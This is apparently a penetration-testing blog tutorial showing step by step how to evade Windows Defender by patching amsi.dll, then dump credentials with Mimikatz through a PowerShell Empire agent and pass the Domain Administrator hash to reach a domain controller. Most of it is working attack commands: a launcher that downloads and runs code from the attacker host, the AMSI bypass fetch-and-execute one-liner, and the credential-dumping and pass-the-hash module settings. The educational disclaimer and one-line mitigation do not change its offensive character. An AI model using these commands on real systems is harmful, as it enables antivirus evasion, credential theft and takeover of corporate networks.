Evade Windows Defender Mimikatz detection by patching the amsi.dll
Summary
In the article, I will show you how you can use Empire and execute the Mimikatz module to dump the logged in user password hashes.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Mimikatz (Benjamin Delpy) is the most famous tool for extracting passwords stored in memory. If you need a password of a logged in user, Mimikatz do the job. Unfortunately, using this tool or simulator tools has a downside these days. They are almost certainly detected by security software such as Windows Defender Anti Malware Scan Interface (AMSI).
Malware detection can be bypassed using several powerful tools. An excellent resource for different kinds of Windows Defender AMSI bypasses can be found on Fabian Mosch’s site https://s3cur3th1ssh1t.github.io/. In this blog, I’ll show you how to use one of the scripts on the Fabian Mosch website to bypass the Windows Defender detection when using PowerShell Empire’s Mimikatz module. This PowerShell script will inject into the amsi.dll that is responsible for the anti-maliware scanning on Windows systems.
This POC consists of three machines: the victim (Windows 10 Professional 64bits), Windows 2012R2 domain controller and an attacker machine (Kali Linux 2022.1).
Victim 01:
— Windows 10 Professional [version 10.0.19044.1706]
— IP address: 192.168.62.165
— Security: Windows Firewall all profiles on, Windows Defender=on
— User context: POC user is member of the local Administrators group and the Domain Users group
Victim 02 (‘Windows Domain Controller’):
— Windows Server 2012R2 [version 6.3.9600] (180 days evaluation)
— IP address: 172.16.78.246
— Security: Antivirus detection and Windows Firewall all profiles on.
Attacker (for reverse shell):
— Kali Linux
— IP-Address: 192.168.62.161
The following requirements apply:
— you established an initial foothold (reverse shell) on the victim workstation (192.168.62.165)
— the exploited user is a member of the Domain Users group and has local Administrator privileges on his workstation (local Administrator rights are required in order to dump password hashes)
— the built-in Domain Administrator established a logged in session on the victim workstation (192.168.62.165)
The next sections include:
— Enumerate exploited user context
— Steps 1–8: setup Empire environment
— Steps 9–10: bypass Windows Defender detection
— Steps 11–12: use Empire’s module "Mimikatz" to dump the logged in user password hashes
— Steps 13–16: use Empire’s module "Mimikatz pth" to impersonate the Domain Administrator.
Before we start our PoC, let’s examine the exploited environment.
Windows 10 Security Dashboard:
Windows Defender Antivirus settings
Windows Firewall
Windows version
Summary of the exploited environment.
The attacker landed on a fully updated Windows 10 client. This client has Windows Defender Realtime Scanning enabled. Also, all Firewall Profiles are enabled. The exploited user is member of the Domain Users group and this user does have local administrator privileges on his workstation. The attacker does not have direct TCP/IP access to the domain controller (in isolated subnet).
POC; Evade Windows Defender PowerShell empire agent detection
Let’s start the exploitation process.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Start Empire server.
sudo powershell-empire server
2. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Open another terminal tab and start empire client.
powershell-empire client
3. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Create a new Empire listener.
listeners
uselistener http
Configure the listener (use your Kali ip-address).
info
set Name blabla
set Host 192.168.62.161:443
set Port 443
execute
back
4. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Create a new Empire launcher.
usestager windows/launcher_bat
set Listener blabla
execute
5. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Copy launcher to HTTP Staging dir (/tmp port 80)
cp /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat /tmp6. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Open a new terminal tab and start a temporary HTTP web server. We will use this server throughout the entire exploitation process.
python3 -m http.server 80 — directory /tmp
7. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Copy the contents of the file launcher.bat to the clipboard.
cat /tmp/launcher.bat
@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass “(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(‘http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex”
(goto) 2>nul & del “%~f0”
8. Performed on 192.168.62.165 (victim machine, Windows 10 reverse shell)
Paste the contents from the clipboard into the shell
@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"
AMSI_bypass_Reflection.ps1
We have our challenge: get an Empire agent up and running without AMSI detection.
To overcome this problem we use the script AMSI_bypass_Reflection.ps1. This script performs “memory hijacking”. The logic is to hook the Windows kernel function AmsiScanBuffer() so that it always returns the handle AMSI_RESULT_CLEAN indicating that AMSI has found no malware.
9. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download the latest version of AMSI_bypass_Reflection.ps1 to the HTTP staging directory (/tmp)
wget https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1 -O /tmp/amsi-bypass.ps1
10. Performed on 192.168.62.165 (victim machine, Windows 10 reverse shell)
Use AMSI_bypass_Reflection.ps1 together with our Empire launcher.bat script.
Check the contents from the script /tmp/laucher.bat (see step 7) and copy only the PowerShell part from laucher.bat to clipboard (all code between the first and second double quote):
(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(‘http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex
Next, create the following one liner (paste contents of clipboard):
set LHOST="192.168.62.161"
set LPORTWEB=80
powershell -nol -w 1 -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://%LHOST%:%LPORTWEB%/amsi-bypass.ps1');Start-Sleep 2;<paste from clipboard>"The end result is:
set LHOST="192.168.62.161"
set LPORTWEB=80
powershell -nol -w 1 -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://%LHOST%:%LPORTWEB%/amsi-bypass.ps1');Start-Sleep 2;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex;"Now, paste the end result in the PowerShell Empire shell.
Also check if amsi-bypass.ps1 is downloaded from the HTTP stager.
Check your Powershell-empire-client console. You must see a new agent checked in. If not, try this step once more.
Note: you may still get a virus detection warning, but this does not stop the PowerShell Agent from connecting.
Use the “agents” command to see more details about the checked-in agent.
We beat the Windows Defender software and got ourselves an Empire shell!
Note the asterisk * sign behind the agent name. The asterisk means that we have an elevated agent connection. This qualifies for further exploitation. Reasons for not having an elevated Empire agent:
— UAC settings prevent the agent to run at high privilege level
— the user is not a local Administrator
From here you can use the PowerShell empire post-exploitation modules. In the next section I’ll show you specifically what you can do with the powershell/credentials/mimikatz/logonpasswords module.
11. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Load the Mimikatz module.
usemodule powershell/credentials/mimikatz/logonpasswords
12. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Extract all logged in user password hashes from memory. You need to set your correct agent name.
set Agent LFSEAMKN
executeWait until you see “Agent(s) received task results:”
interact LFSEAMKN
We have the NTLM (65ad2f6401724d2f73e7b7721dd28853) password hash for the Domain Administrator!
We can use this hash value with different pass-the-hash modules like powershell/lateral_movement/invoke_smbexec or powershell/credentials/mimikatz/pth.
In the last section I will demonstrate how to use this hash value to impersonate the Domain Administrator.
13. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Test if the exploited user is able to browse the c$ share on the target domain controller.
interact LFSEAMKM
shell
dir \\dc.mydomain.com\c$
exit
The exploited user does not have access to the domain controller c$ share.
14. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Load the Mimikatz pass-the-hash module.
usemodule powershell/credentials/mimikatz/pth
15. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Configure the module with the Domain Administrator NTLM hash.
set agent LFSEAMKM
set domain MYDOMAIN
set ntlm 65ad2f6401724d2f73e7b7721dd28853
set user Administrator
execute
Wait until you see “Agent(s) received task results:”
interact LFSEAMKM
16. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)
Use the Domain Administrator token (PID of cmd.exe) to browse the c$ share on the domain controller
back
interact LFSEAMKM
steal_token 2132
Wait until you see “Agent(s) received task results:”
shell
dir \\dc.mydomain.com\c$
We are able to browse the c$ share on the target domain controller!
Mitigation recommendations.
Sooner or later, malicious PowerShell scripts will be detected by the antivirus software vendors. At the time of writing (31 July 2022) the script AMSI_bypass_Reflection.ps1 was not detected by the Windows antivirus software. It probably will in the near future. You can mitigate this by keeping your antivirus software up to date.
Credits
Credits to Fabian Mosch alias S3cur3Th1sSh1t. for his research work
Credits to Shantanu Khandelwal (@shantanukhande) and Paul Laîné (@am0nsec) for developing AMSI Bypass
Credits to BC-Security for developing and maintaining Empire (https://github.com/BC-SECURITY)
